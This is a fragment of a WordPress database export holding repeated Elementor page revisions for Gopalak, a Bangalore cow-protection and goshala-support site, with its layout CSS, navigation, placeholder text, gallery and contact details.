\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:13:45','2022-10-11 12:43:45','',1373,'https://gopalak.in/?p=1650',0,'revision','',0),(1651,1,'2022-10-11 18:13:45','2022-10-11 12:43:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:13:45','2022-10-11 12:43:45','',1373,'https://gopalak.in/?p=1651',0,'revision','',0),(1652,1,'2022-10-11 18:13:45','2022-10-11 12:43:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:13:45','2022-10-11 12:43:45','',1373,'https://gopalak.in/?p=1652',0,'revision','',0),(1654,1,'2022-10-12 12:41:00','2022-10-12 07:11:00','','values','','inherit','open','closed','','values','','','2022-10-12 12:41:00','2022-10-12 07:11:00','',0,'https://gopalak.in/wp-content/uploads/2022/10/values.png',0,'attachment','image/png',0),(1655,1,'2022-10-12 12:45:25','2022-10-12 07:15:25','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:45:25','2022-10-12 07:15:25','',1373,'https://gopalak.in/?p=1655',0,'revision','',0),(1656,1,'2022-10-12 12:45:25','2022-10-12 07:15:25','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" 